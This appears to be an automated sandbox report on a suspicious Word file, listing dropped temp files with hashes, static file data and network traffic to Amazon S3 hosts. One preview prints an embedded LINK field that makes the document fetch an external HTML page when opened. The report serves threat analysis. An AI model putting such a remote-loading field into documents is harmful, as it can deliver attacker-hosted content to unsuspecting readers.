SHA1:	15571D97AB15114444C8D1417EA4385B08A95AAC
SHA-256:	5F977543C7268FB6319F49174CA499F7280C60619EB293710530F3DA70DD7D56
SHA-512:	C2F89215A9F603F9053DDF9101B818322D778E99006436F5B70F0B21285578DE1F8E83780B8C92E3EF8A33D75230FA4E24670CD7FAD2A6560CA5B1CA22335C8C
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{903BB447-6E72-4B36-901B-CD1D48C95A6E}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.0893697448949966
Encrypted:	false
SSDEEP:	6:olgI5lNcYeupcIupMzId5XwPB8EURyajJ2QN/wPxZSu7mN:4veIcIUMcd5AB8uWJ2LZS1
MD5:	AAA6D6B978FBAFCD5DD76FAC163C7DE5
SHA1:	82815A1CE8117B7B3EF81BB8E098CFA21DC0A62C
SHA-256:	7BC2DB1BBCF5FE247881220B96C3F0901535FAE1D23499ADE5F1BC477E676657
SHA-512:	8131699881585D82A05E86BEEB725C94D31224E8FE01415B6961172013DEE1CD440D18D1FFDB3C4AE11017D2DE6113E9DB875D73F706551CBA84057137EC9A11
Malicious:	false
Reputation:	low
Preview:	..L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.s.:././.s.q.d.o.c.s...s.3...e.u.-.w.e.s.t.-.2...a.m.a.z.o.n.a.w.s...c.o.m./.f.b.0.f.9.c.4.5.-.f.b.5.f.-.4.6.9.0.-.9.8.1.5.-.e.1.1.a.7.6.2.d.4.7.3.9...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CFED663A-BFB4-4992-A74D-FB6645F47512}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{5B541EB6-3011-4BB0-8233-8C3AF7CB0014}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02562575380283315
Encrypted:	false
SSDEEP:	6:I3DPcYT8i4HvxggLR9CeXA4NN1Jz7RXv//4tfnRujlw//+GtluJ/eRuj:I3DPKPDr3zdvYg3J/
MD5:	A68E81A344AB9C81C9BC70AE0905482B
SHA1:	F4906409313793A5A995A888182056AE985A6B67
SHA-256:	1D1FA63626F3B3B34AB323C760173C1332846F07933A256F2EB07E974CE41E03
SHA-512:	CE2E7D51E75240A035688C7C152A50A3541E542C465A13AE3172F385623A0C171522953AD2684977E98768956F9E1F5B5ED6D6AE9D0C5AD1B6E4A2250311E010
Malicious:	false
Preview:	......M.eFy...z?.....@C.]......S,...X.F...Fa.q..............................y%...G..%.=[..........!O..]..F.....z.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{9FEF270D-0727-481F-BD99-6F48A0D18A8D}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02558447946861823
Encrypted:	false
SSDEEP:	6:I3DPcLkMuX2bvxggLRPV1TPlW6RXv//4tfnRujlw//+GtluJ/eRuj:I3DPjMNjV1TPDvYg3J/
MD5:	71384542A463819B0830984AE4F98E11
SHA1:	DEA21C166A54CF414730E9084A74B4BA7DD63E3A
SHA-256:	0E5CBD34A6F6EE79FF97B80B9DA9FDB3DCB529098940A7A152943B6C8AA5ADF2
SHA-512:	8ED44F5336445FC9E1CEA6E7F906A003B731B692594CD358A78696922B874265B8E162F3B62119FD2EBDE00AA8CBC47900554417DE4395A5643D8339F50BCB6A
Malicious:	false
Preview:	......M.eFy...zL..q).BG. 1h...oS,...X.F...Fa.q...............................e...L..\|z...].........:"\.x&E...&A.q......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\icRTA4gcSe.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Aug 18 07:55:03 2022, mtime=Thu Aug 18 07:55:03 2022, atime=Thu Aug 18 07:55:13 2022, length=11588, window=hide
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	4.556276070350963
Encrypted:	false
SSDEEP:	24:8qZk/XTRKJRO2XInaNey0znoDv3qc4u7D:8qZk/XT0R6aNaz3f0D
MD5:	DB94315235E4893B9DAEB87DEA673DC9
SHA1:	D6AF234C06E316F44425FBCDB18382812BDE591C
SHA-256:	F285EEA55EAB1054656109D1E28CFFEFD9FBA6077F948E8886430DB09A43EDB8
SHA-512:	F31D1418E6ED4668C941DB51AEBFDB4A27A8DAE45481DB78BD279DFFA79FAE9CFE5AF6732E6D8F550DEAEB823B611EA6EEE5B10CCE827246B893F239B34B39E1
Malicious:	false
Preview:	L..................F.... ...?..4...?..4...r..:...D-...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1......U.F..Desktop.d......QK.X.U.F..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.D-...U.F .ICRTA4~1.DOC..L.......U.F.U.F.........................i.c.R.T.A.4.g.c.S.e...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\icRTA4gcSe.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.c.R.T.A.4.g.c.S.e...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9G..N..... .....[D_....3N...W...9G

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.680584037314278
Encrypted:	false
SSDEEP:	3:bDuMJlUGBkRMApSmxWHgiRMApSv:bC+Y
MD5:	53C3D14293FED3A106A4BBFA435C6D6D
SHA1:	7B94F89CF983DB252AC21359B6F9F428894FA26F
SHA-256:	FFE1538C5E2466AE8313ECA1BC671BB1E83CBDEE9E38235EE205BD3C464CE918
SHA-512:	D41CDCF858E0210DB88477FB65A8D9DEA6CDA26590D536B1027506AC63BE6AABCE98289F3C7B5867D7892DBBBCF2D1E045FF4B9C2A81841BB7CF6A028D8B3E0E
Malicious:	false
Preview:	[folders]..Templates.LNK=0..icRTA4gcSe.LNK=0..[misc]..icRTA4gcSe.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Users\user\Desktop\~$RTA4gcSe.docx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.342099959599253
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	icRTA4gcSe.docx
File size:	11588
MD5:	9873ccaccab0237bf533324f69dff3b3
SHA1:	29d098d9ddf7e425413817089beb2eb14c91bc64
SHA256:	05625644a2e070d4780822daf7126f408ec0db9881a9995dc24ee500b624a198
SHA512:	882c74e579e8aa9cc9fff1eb29c9f01a7a8c85fbff836676f79eedf1fbd5eedce1872977935e68faa59dc3049095b40f19b06e43717bead435a0e22c070cc962
SSDEEP:	192:CtIWmk402hTZ3S7Ok0lyCpLpYBV7PuNrxnpApwzxux:aIWmkIhTZC789YBY9Vzxux
TLSH:	BB32BF37CE46E822C641C87871D942EFF32C4797A715CBDB414E52C6149738A23BEE29
File Content Preview:	PK..........!....lZ... .......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2022 01:55:36.125607014 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.125644922 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.128518105 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.135190010 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.135205984 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.259619951 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.259758949 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.272383928 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.272414923 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.272818089 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.272906065 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.574213982 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.610374928 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.610465050 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.610624075 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.610676050 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.610704899 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.610740900 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.610759020 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.610800028 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.610905886 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.610920906 CEST	443	49173	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:36.610930920 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:36.610966921 CEST	49173	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:42.608117104 CEST	49174	443	192.168.2.22	3.5.246.192
Aug 18, 2022 01:55:42.608206034 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:42.608326912 CEST	49174	443	192.168.2.22	3.5.246.192
Aug 18, 2022 01:55:42.609107018 CEST	49174	443	192.168.2.22	3.5.246.192
Aug 18, 2022 01:55:42.609138966 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:42.724134922 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:42.724317074 CEST	49174	443	192.168.2.22	3.5.246.192
Aug 18, 2022 01:55:42.740303993 CEST	49174	443	192.168.2.22	3.5.246.192
Aug 18, 2022 01:55:42.740350008 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:42.741024971 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:42.772023916 CEST	49174	443	192.168.2.22	3.5.246.192
Aug 18, 2022 01:55:42.815366983 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:42.828835964 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:42.828895092 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:42.829138041 CEST	49174	443	192.168.2.22	3.5.246.192
Aug 18, 2022 01:55:42.829344034 CEST	49174	443	192.168.2.22	3.5.246.192
Aug 18, 2022 01:55:42.829380035 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:42.829469919 CEST	49174	443	192.168.2.22	3.5.246.192
Aug 18, 2022 01:55:42.829488039 CEST	443	49174	3.5.246.192	192.168.2.22
Aug 18, 2022 01:55:49.094383001 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.094430923 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.094513893 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.094685078 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.094698906 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.202418089 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.202544928 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.210449934 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.210472107 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.213171005 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.213186979 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.267653942 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.267832041 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.267858028 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.267931938 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.267949104 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.267965078 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.268089056 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.268238068 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.271374941 CEST	49179	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.271401882 CEST	443	49179	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.465087891 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.465141058 CEST	443	49180	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.465229988 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.465667009 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.465696096 CEST	443	49180	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.580333948 CEST	443	49180	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.580420017 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.588308096 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.588336945 CEST	443	49180	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.592042923 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.592061043 CEST	443	49180	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.649596930 CEST	443	49180	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.649720907 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.649743080 CEST	443	49180	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.649780035 CEST	443	49180	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.649816036 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.649847031 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.649908066 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.649928093 CEST	443	49180	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.649936914 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.650015116 CEST	49180	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.841377974 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.841432095 CEST	443	49181	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.841507912 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.841787100 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.841803074 CEST	443	49181	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.956001043 CEST	443	49181	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.956197023 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.969937086 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.969959974 CEST	443	49181	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:49.973481894 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:49.973499060 CEST	443	49181	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.022438049 CEST	443	49181	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.022537947 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.022545099 CEST	443	49181	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.022598982 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.022664070 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.022684097 CEST	443	49181	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.022696972 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.022742987 CEST	49181	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.040566921 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.040596008 CEST	443	49182	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.040657997 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.041404963 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.041415930 CEST	443	49182	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.149288893 CEST	443	49182	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.149471045 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.167557001 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.167572975 CEST	443	49182	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.170388937 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.170406103 CEST	443	49182	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.205600023 CEST	443	49182	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.205756903 CEST	443	49182	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.205760002 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.205847025 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.205962896 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.205976009 CEST	443	49182	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.205985069 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.206105947 CEST	49182	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.304431915 CEST	49183	443	192.168.2.22	52.95.148.170
Aug 18, 2022 01:55:50.304481030 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.304564953 CEST	49183	443	192.168.2.22	52.95.148.170
Aug 18, 2022 01:55:50.305003881 CEST	49183	443	192.168.2.22	52.95.148.170
Aug 18, 2022 01:55:50.305022955 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.420042038 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.420150995 CEST	49183	443	192.168.2.22	52.95.148.170
Aug 18, 2022 01:55:50.428646088 CEST	49183	443	192.168.2.22	52.95.148.170
Aug 18, 2022 01:55:50.428683996 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.429462910 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.438299894 CEST	49183	443	192.168.2.22	52.95.148.170
Aug 18, 2022 01:55:50.479389906 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.497262955 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.497385025 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.497427940 CEST	49183	443	192.168.2.22	52.95.148.170
Aug 18, 2022 01:55:50.497473955 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.497490883 CEST	49183	443	192.168.2.22	52.95.148.170
Aug 18, 2022 01:55:50.497509003 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.497539997 CEST	49183	443	192.168.2.22	52.95.148.170
Aug 18, 2022 01:55:50.497546911 CEST	443	49183	52.95.148.170	192.168.2.22
Aug 18, 2022 01:55:50.510514975 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.510581017 CEST	443	49184	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.510674953 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.510879040 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.510905981 CEST	443	49184	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.616765976 CEST	443	49184	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.616858959 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.627726078 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.627751112 CEST	443	49184	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.630455971 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.630467892 CEST	443	49184	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.684575081 CEST	443	49184	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.684695005 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.684717894 CEST	443	49184	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.684741974 CEST	443	49184	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.684803963 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.687773943 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.690954924 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.690982103 CEST	443	49184	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.690990925 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.691052914 CEST	49184	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.696475029 CEST	49185	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.696523905 CEST	443	49185	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.696598053 CEST	49185	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.696810007 CEST	49185	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.696835041 CEST	443	49185	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.814220905 CEST	443	49185	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.814347982 CEST	49185	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.821496964 CEST	49185	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.821533918 CEST	443	49185	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.824235916 CEST	49185	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.824259996 CEST	443	49185	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.881546974 CEST	443	49185	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.881648064 CEST	443	49185	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:50.881670952 CEST	49185	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.881767035 CEST	49185	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.881958008 CEST	49185	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:50.881969929 CEST	443	49185	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.109143019 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.109193087 CEST	443	49186	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.109270096 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.109585047 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.109603882 CEST	443	49186	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.217353106 CEST	443	49186	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.217545986 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.230094910 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.230104923 CEST	443	49186	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.233989000 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.234002113 CEST	443	49186	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.288229942 CEST	443	49186	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.288347960 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.288368940 CEST	443	49186	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.288444996 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.288503885 CEST	443	49186	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.288572073 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.288634062 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.288649082 CEST	443	49186	3.5.244.102	192.168.2.22
Aug 18, 2022 01:55:51.288702965 CEST	49186	443	192.168.2.22	3.5.244.102
Aug 18, 2022 01:55:51.288727045 CEST	49186	443	192.168.2.22	3.5.244.102

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2022 01:55:36.086070061 CEST	55868	53	192.168.2.22	8.8.8.8
Aug 18, 2022 01:55:36.106134892 CEST	53	55868	8.8.8.8	192.168.2.22
Aug 18, 2022 01:55:42.564024925 CEST	49688	53	192.168.2.22	8.8.8.8
Aug 18, 2022 01:55:42.583273888 CEST	53	49688	8.8.8.8	192.168.2.22
Aug 18, 2022 01:55:42.586708069 CEST	58836	53	192.168.2.22	8.8.8.8
